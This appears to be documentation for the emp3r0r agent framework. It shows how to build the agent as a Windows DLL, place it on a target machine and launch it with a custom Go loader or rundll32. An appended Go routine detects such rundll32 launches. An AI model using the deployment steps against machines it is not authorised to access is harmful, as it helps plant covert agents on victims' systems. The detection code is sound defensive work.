DLL Agent
Update `./cmd/agent/main.go` to include the following lines:

```go
// everything else

import "C" // enables cgo; required for //export to take effect

//export main
func main() { // the //export comment must sit directly above the function
	// everything else
}
```

This will export the `main` function, making it callable from outside the DLL.
Ensure that you have both mingw and Go environments installed on your Windows machine.

Run the following command on your Windows host to compile the agent as a DLL:

```powershell
go build -buildmode=c-shared -ldflags='-s -w -H=windowsgui' -o emp3r0r.dll .\cmd\agent\
```

Move the compiled `emp3r0r.dll` to the `~/.emp3r0r/stub-win-dll-amd64` directory on your server.

Open emp3r0r on your server, run the `gen_agent` command, and select option 3 to configure the agent for Windows.

Once the DLL is generated, copy it to your Windows target machine for use.
You can test the DLL using a small tool that invokes functions from a DLL. Here's an example:

```go
//go:build windows

package main

import (
	"flag"
	"fmt"
	"os"
	"syscall"
)

func main() {
	dllFile := flag.String("dll", "", "Load this DLL file")
	funcName := flag.String("func", "", "Call this function")
	flag.Parse()
	if *dllFile == "" || *funcName == "" {
		flag.Usage()
		os.Exit(2)
	}

	// Load the DLL into this process
	dll, err := syscall.LoadLibrary(*dllFile)
	if err != nil {
		fmt.Println("Error loading DLL:", err)
		return
	}
	defer syscall.FreeLibrary(dll)

	// Resolve the exported function by name
	proc, err := syscall.GetProcAddress(dll, *funcName)
	if err != nil {
		fmt.Println("Error getting function address:", err)
		return
	}

	// Call the function; the exported main takes no arguments
	_, _, _ = syscall.SyscallN(proc)
}
```
To build and run this tool:

In PowerShell, enable logging so you can confirm that the agent is running:

```powershell
$env:VERBOSE='true'
```

Use the following command to call the `main` function from your `emp3r0r.dll`:

```powershell
.\rundll.exe -func main -dll emp3r0r.dll
```

Alternatively, you can invoke the DLL using `rundll32.exe`:

```powershell
rundll32.exe emp3r0r.dll main
```

However, this might not provide visible output even if `VERBOSE` is set to `true`, since rundll32.exe is a GUI-subsystem process with no console for the agent's log output.
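Added example, not part of the emp3r0r project: the detection-side counterpart to the commands above. It inspects process-creation command lines (Sysmon Event ID 1 or Security event 4688) for rundll32.exe loading a DLL from outside the Windows directory or calling an entry point named `main`, the export that `//export main` produces. The sample command line is constructed, and `splitArgs` and `flagRundll32` are names chosen here.

```go
package main

import "fmt"
import "strings"

// splitArgs splits a Windows command line on spaces, keeping double-quoted
// arguments (paths with spaces) whole and stripping the quotes.
func splitArgs(cmd string) (args []string) {
	inQ, start := false, -1
	for i, r := range cmd + " " { // trailing space flushes the last argument
		switch {
		case r == '"':
			inQ = !inQ
		case r == ' ' && !inQ && start >= 0:
			args = append(args, strings.ReplaceAll(cmd[start:i], `"`, ""))
			start = -1
		}
		if (r != ' ' || inQ) && start < 0 {
			start = i
		}
	}
	return args
}

// flagRundll32 returns why a process-creation command line looks like a DLL agent
// being loaded through rundll32.exe: the DLL sits outside the Windows directory, or
// the entry point is "main", the symbol a Go c-shared DLL exposes. nil means clean.
func flagRundll32(cmdLine string) (reasons []string) {
	args := splitArgs(cmdLine)
	if len(args) < 2 || !strings.HasSuffix(strings.ToLower(args[0]), "rundll32.exe") {
		return nil
	}
	dll, entry := args[1], "" // rundll32 accepts "<dll>,<entry>" or "<dll> <entry>"
	if i := strings.Index(dll, ","); i >= 0 {
		dll, entry = dll[:i], dll[i+1:]
	} else if len(args) > 2 {
		entry = args[2]
	}
	if !strings.HasPrefix(strings.ToLower(dll), `c:\windows\`) {
		reasons = append(reasons, "DLL outside the Windows directory: "+dll)
	}
	if strings.EqualFold(entry, "main") {
		reasons = append(reasons, "entry point main (Go c-shared export)")
	}
	return reasons
}

func main() { // constructed sample command line, not real telemetry
	fmt.Println(flagRundll32(`rundll32.exe emp3r0r.dll main`))
}
```

The custom `rundll.exe` loader above never appears in a rundll32 rule; image-load telemetry (Sysmon Event ID 7) for DLLs loaded from user-writable paths is the complementary signal.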